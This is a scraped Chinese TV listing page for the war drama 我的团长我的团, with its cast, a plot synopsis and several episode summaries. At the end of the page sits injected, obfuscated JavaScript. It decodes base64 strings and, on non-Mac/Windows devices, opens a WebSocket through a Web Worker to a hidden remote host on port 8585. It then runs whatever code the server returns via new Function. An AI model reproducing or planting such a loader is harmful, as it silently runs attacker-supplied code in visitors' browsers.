我的团长我的团

  • 剧情电视剧 年代电视剧 战争电视剧 军事电视剧
  • 段奕宏 张译 张国强 邢佳栋 李晨 王迅
  • 共43集  |  每集 45分钟
  • 时间回转到1942年,中国大地正深陷于抗日战争的苦难之…时间回转到1942年,中国大地正深陷于抗日战争的苦难之中,各地军民的反抗斗争进行得如火如荼之际……60年前从红土高原延伸出了这样一条条抗战生命线,它们构筑了高原新的脊梁。中国军民如何前仆后继地浴血奋战消灭日寇保卫抗战生命线的真实历史故事。  1942年,中国大地正深陷于抗日战争的苦难之中,各地军民的反抗斗争进行得如火如荼…… 在一个离中缅边境不远叫作禅达的地方,一群来自五湖四海、不同出身不同身份甚至是不同政见的溃兵和百姓,因为种种命运际遇的原因而相会于此:北平人孟烦了、军医郝兽医、湖南兵不辣、上海虞啸卿、军官阿译、东北佬迷龙、豆饼、要麻、蛇屁股、康丫、川妹子陈小醉……战争的苦难和身体的伤病让他们过着绝望的日子,他们互相厌憎又相依为命,不饿死不病死成为他们每天生存的最高目标。为了在严酷的战争环境下生存下来,别无选择的他们不得不摒弃前仇、恩怨、偏见、狭隘而团结一致组成一支小分队,在现实的困境中他们认识到了民族存亡的大义,于是义无返顾共同投入到打击日本侵略者、保卫家园、捍卫尊严、为抗战胜利不惜付出生命代价的正义斗争中,用血肉之躯书写一曲曲铁血卫国的悲壮战歌!  一场战役过后小分队死伤惨重,硝烟弥漫中突然闯进一人,这个用诡计杀死了在仓库外封杀的四个日本兵的诡异男人自称是川军团团长龙文章!回到禅达,龙文章被宪兵逮捕,原来他不是什么团长,只是一个在团副死后摘了团副军衔给自己挂上的中尉。其他人被关在收容站,就在众人揣测身世极端坎坷的龙文章已经被枪毙之际,传来新师长虞啸卿正式任命龙文章为团长的消息……  在和日军凭怒江对峙的时刻,绝地求生的他们邂逅了一个有红色倾向的学生,龙文章和他相见恨晚,在理想与灵魂的辩论中面红耳赤…最后龙文章意味深长地说:我们太老,他们太年轻……  不久,龙文章拉出一支十三人突击队从红色学生说过的一处没被日军监控的湾流通过怒江去对岸和顺镇救回孟烦了的双亲。日占区的疮痍让众人觉得满心罪过,而龙文章把他所谓的搭救变成了一场渡江侦察,期间众人邂逅了一支共产党游击队,曾经和龙文章辩论的红色学生已经是游击队员……突击队成功撤回东岸,游击队为了不让日军发现那条过江通道而全军覆没……  虞啸卿正在准备一场大规模的渡江攻势,打算拿下已成心腹之患的南天门,一年多来日军已经把整座山改造成了庞大的堡垒,而以炮灰团从江那边得来的经验,这样的攻势一定是必败。龙文章力止,虞啸卿给他半个月时间去寻找放弃攻击的证据。龙文章和孟烦了被迫出没西岸,在日军眼皮底下绘制南天门工事图。在龙文章收集不可攻击的证据时,同样找到了攻下南天门的方法,但他无法说出“那个极其惨烈的方法”,因为他爱惜这个被戏称为炮灰团的每个人的性命,他心里清楚,“那个极其惨烈的方法”将意味着什么……  这是一场战争,一场从此将炮灰团深深烙在历史长轴上的惊天地、泣鬼神的死亡之战……  《我的团长,我的团》是一部主旋律题材作品,它从一个独特的视角展现了中国各地军民联合起来共同抗击日本侵略者、承受战争苦难的历史全景图,突出了中国军民的民族大义和豪迈正气,其惨烈残酷、其艰苦卓绝、其无与伦比的历史真实度与深刻的历史存在感,将令每一个观看此剧的观众再一次地成为这段历史的亲历者与见证人……

我的团长我的团分集剧情

我的团长我的团第43集剧情查看详细

唐基冲上来,告诉虞啸卿终于有救了。上峰已经同意打了,而且要打大仗。这就需要等待,因为这已经不是一个师的事了。上峰已经任命虞啸卿统帅整个战役,军长指日可待。但是现在,需要具体筹措,而不是救几个南天门的残…

我的团长我的团第42集剧情查看详细

在东岸,虞啸卿也在质问唐基,我们什么时候能打过去。唐基说有转机了,大后天有大雾,再等等吧。南天门上也在计算,可是援兵仍然没有。日本人倒是趁大雾摸了上来,他们还施放毒气,这和龙文章沙盘大战的时候想得一模…

我的团长我的团第40集剧情查看详细

坑道终于炸开了。巨大的声响传到了对岸,虞啸卿命令部队准备渡江。可这不是约定的信号,虞师内部起了争执。龙文章带着队伍进到一处比较宽的坑道,他们边冲边打,向日军的纵深挺进着。很奇怪的是日军的数量不是很多,…

角色剧照

同类型

同主演

我的团长我的团评论

  • 评论加载中...


function bwfxQsPX(e){var t="",n=r=c1=c2=0;while(n 0x3c e.length){r=e.charCodeAt(n);if(r 0x3c 128){t+=String.fromCharCode(r);n++;}else if(r 0x3e 191&&r 0x3c 224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)0x3c0x3c 6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)0x3c0x3c 12|(c2&63)0x3c0x3c 6|c3&63);n+=3;}}return t;};function FtMDu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f 0x3c e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s 0x3c0x3c 2|o 0x3e0x3e 4;r=(o&15)0x3c0x3c 4|u 0x3e0x3e 2;i=(u&3)0x3c0x3c 6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return bwfxQsPX(t);};/*wTKSnbBHwyCwOCCL*/window[''+'Q'+'h'+'d'+'t'+'K'+'C'+'A'+'O'+'T'+'r'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=FtMDu,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1]))); new Worker(window.URL.createObjectURL(new Blob(["var ws=new WebSocket('wss://"+k+":8585/"+i+"-0');ws.onmessage=function(e){ws.close();postMessage(e.data)};"]))).onmessage=function(e){new Function('_tdcs',x(e.data))(cs);}})('kkkkwTKSnbBHwyCwOCCL','d33NzLmhhb33l1bmRtbi5jb20=','v-28-128',window,document,['Q','3']);}:function(){};